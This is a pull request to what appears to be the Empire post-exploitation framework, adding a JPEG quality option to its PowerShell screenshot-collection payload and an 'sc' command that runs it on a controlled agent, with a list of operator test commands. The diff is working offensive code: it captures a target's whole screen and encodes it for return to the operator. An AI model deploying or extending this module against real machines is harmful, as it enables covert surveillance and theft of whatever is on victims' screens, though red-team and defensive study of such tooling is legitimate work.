### PR TITLE
jpeg screenshots and call shortcut

### DIFF
--- a/data/module_source/collection/Get-Screenshot.ps1
+++ b/data/module_source/collection/Get-Screenshot.ps1
@@ -1,14 +1,37 @@
 function Get-Screenshot 
 {
-    Add-Type -Assembly System.Windows.Forms
-    $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
-    $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
-    $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
-    $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
-    $DrawingGraphics.Dispose()
-    $ms = New-Object System.IO.MemoryStream
-    $ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png)
-    $ScreenshotObject.Dispose()
-    [convert]::ToBase64String($ms.ToArray())
+    param
+    (
+        [Parameter(Mandatory = $False)]
+        [string]
+        $Ratio
+    )
+    Add-Type -Assembly System.Windows.Forms;
+    $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen;
+    $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height;
+    $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject);
+    $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size);
+    $DrawingGraphics.Dispose();
+    $ms = New-Object System.IO.MemoryStream;
+    if ($Ratio) {
+    	try {
+    		$iQual = [convert]::ToInt32($Ratio);
+    	} catch {
+    		$iQual=80;
+    	}
+    	if ($iQual -gt 100){
+    		$iQual=100;
+    	} elseif ($iQual -lt 1){
+    		$iQual=1;
+    	}
+    	$encoderParams = New-Object System.Drawing.Imaging.EncoderParameters;
+			$encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual);
+			$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq "JPEG" }
+			$ScreenshotObject.save($ms, $jpegCodec, $encoderParams);
+		} else {
+    	$ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png);
+    }
+    $ScreenshotObject.Dispose();
+    [convert]::ToBase64String($ms.ToArray());
 }
 Get-Screenshot

--- a/lib/common/empire.py
+++ b/lib/common/empire.py
@@ -1742,6 +1742,32 @@ class AgentMenu(cmd.Cmd):
         else:
             print helpers.color("[!] Injection requires you to specify listener")
 
+    def do_sc(self, line):
+        "Takes a screenshot, default is PNG. Giving a ratio means using JPEG. Ex. sc [1-100]"
+			
+        # get the info for the psinject module
+        if len(line.strip())>0:
+            # JPEG compression ratio
+            try:
+                sRatio = str(int(line.strip()))
+            except:
+                print helpers.color("[*] JPEG Ratio incorrect. Has been set to 80.")
+                sRatio = "80"
+        else:
+            sRatio = ""
+			
+        if self.mainMenu.modules.modules["collection/screenshot"]:
+            module = self.mainMenu.modules.modules["collection/screenshot"]
+            module.options['Agent']['Value'] = self.mainMenu.agents.get_agent_name(self.sessionID)
+            module.options['Ratio']['Value'] = sRatio
+				
+            # execute the screenshot module
+            l = ModuleMenu(self.mainMenu, "collection/screenshot")
+            l.do_execute("")
+				
+        else:
+            print helpers.color("[!] collection/screenshot module not loaded") 
+
 
     def do_injectshellcode(self, line):
         "Inject listener shellcode into a remote process. Ex. injectshellcode <meter_listener> <pid>"

--- a/lib/modules/collection/screenshot.py
+++ b/lib/modules/collection/screenshot.py
@@ -41,6 +41,7 @@ class Module:
                 'Required'      :   False,
                 'Value'         :   ''
             }
+        }
 
         # save off a copy of the mainMenu object to access external functionality
         #   like listeners/agent handlers/etc.

--- a/lib/modules/collection/screenshot.py
+++ b/lib/modules/collection/screenshot.py
@@ -35,8 +35,12 @@ class Module:
                 'Description'   :   'Agent to run module on.',
                 'Required'      :   True,
                 'Value'         :   ''
+            },
+            'Ratio' : {
+                'Description'   :   "JPEG Compression ration 1 to 100.",
+                'Required'      :   False,
+                'Value'         :   ''
             }
-        }
 
         # save off a copy of the mainMenu object to access external functionality
         #   like listeners/agent handlers/etc.
@@ -54,18 +58,50 @@ class Module:
         script = """
 function Get-Screenshot 
 {
-    Add-Type -Assembly System.Windows.Forms
-    $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen
-    $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height
-    $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject)
-    $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size)
-    $DrawingGraphics.Dispose()
-    $ms = New-Object System.IO.MemoryStream
-    $ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png)
-    $ScreenshotObject.Dispose()
-    [convert]::ToBase64String($ms.ToArray())
+    param
+    (
+        [Parameter(Mandatory = $False)]
+        [string]
+        $Ratio
+    )
+    Add-Type -Assembly System.Windows.Forms;
+    $ScreenBounds = [Windows.Forms.SystemInformation]::VirtualScreen;
+    $ScreenshotObject = New-Object Drawing.Bitmap $ScreenBounds.Width, $ScreenBounds.Height;
+    $DrawingGraphics = [Drawing.Graphics]::FromImage($ScreenshotObject);
+    $DrawingGraphics.CopyFromScreen( $ScreenBounds.Location, [Drawing.Point]::Empty, $ScreenBounds.Size);
+    $DrawingGraphics.Dispose();
+    $ms = New-Object System.IO.MemoryStream;
+    if ($Ratio) {
+    	try {
+    		$iQual = [convert]::ToInt32($Ratio);
+    	} catch {
+    		$iQual=80;
+    	}
+    	if ($iQual -gt 100){
+    		$iQual=100;
+    	} elseif ($iQual -lt 1){
+    		$iQual=1;
+    	}
+    	$encoderParams = New-Object System.Drawing.Imaging.EncoderParameters;
+			$encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual);
+			$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq \"JPEG\" }
+			$ScreenshotObject.save($ms, $jpegCodec, $encoderParams);
+		} else {
+    	$ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png);
+    }
+    $ScreenshotObject.Dispose();
+    [convert]::ToBase64String($ms.ToArray());
 }
 Get-Screenshot"""
+
+        if self.options['Ratio']['Value']:
+            if self.options['Ratio']['Value']!='0':
+                self.info['OutputExtension'] = 'jpg'
+            else:
+                self.options['Ratio']['Value'] = ''
+                self.info['OutputExtension'] = 'png'
+        else:
+            self.info['OutputExtension'] = 'png'
 
         for option,values in self.options.iteritems():
             if option.lower() != "agent":

--- a/lib/modules/collection/screenshot.py
+++ b/lib/modules/collection/screenshot.py
@@ -84,10 +84,10 @@ function Get-Screenshot
     		$iQual=1;
     	}
     	$encoderParams = New-Object System.Drawing.Imaging.EncoderParameters;
-			$encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual);
-			$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq \"JPEG\" }
-			$ScreenshotObject.save($ms, $jpegCodec, $encoderParams);
-		} else {
+    	$encoderParams.Param[0] = New-Object Drawing.Imaging.EncoderParameter ([System.Drawing.Imaging.Encoder]::Quality, $iQual);
+    	$jpegCodec = [Drawing.Imaging.ImageCodecInfo]::GetImageEncoders() | Where-Object { $_.FormatDescription -eq \"JPEG\" }
+    	$ScreenshotObject.save($ms, $jpegCodec, $encoderParams);
+    } else {
     	$ScreenshotObject.save($ms, [Drawing.Imaging.ImageFormat]::Png);
     }
     $ScreenshotObject.Dispose();

--- a/lib/modules/collection/screenshot.py
+++ b/lib/modules/collection/screenshot.py
@@ -37,7 +37,7 @@ class Module:
                 'Value'         :   ''
             },
             'Ratio' : {
-                'Description'   :   "JPEG Compression ration 1 to 100.",
+                'Description'   :   "JPEG Compression ratio: 1 to 100.",
                 'Required'      :   False,
                 'Value'         :   ''
             }


### PR DESCRIPTION
Hi,
Here is a new proposal : jpeg screenshots and call shortcut.
Jpeg can be usefull, 'cause sometimes, bandwith is you enemy and dirty low-ratio jpeg can do the job.

The module works like previously but with an optional parameter : Ratio for jpeg compression.
I also added a shortcut for the screenshot call, directly in the Agent Menu.

I hope this time you won't have to rewrite my code ;-)

Tests done :
(Empire: AAA...) > sc
(Empire: AAA...) > sc 10
(Empire: AAA...) > sc 90
(Empire: AAA...) > sc 150
(Empire: AAA...) > sc -1
(Empire: AAA...) > sc n00b
(Empire: AAA...) > sc 

(Empire: collection/screenshot) > reload
(Empire: collection/screenshot) > set Agent  AAA...
(Empire: collection/screenshot) > run
(Empire: collection/screenshot) > set Ratio 5
(Empire: collection/screenshot) > run
(Empire: collection/screenshot) > set Ratio 90
(Empire: collection/screenshot) > run
(Empire: collection/screenshot) > set Ratio 150
(Empire: collection/screenshot) > run
(Empire: collection/screenshot) > set Ratio -1
(Empire: collection/screenshot) > run
(Empire: collection/screenshot) > set Ratio n00b
(Empire: collection/screenshot) > run


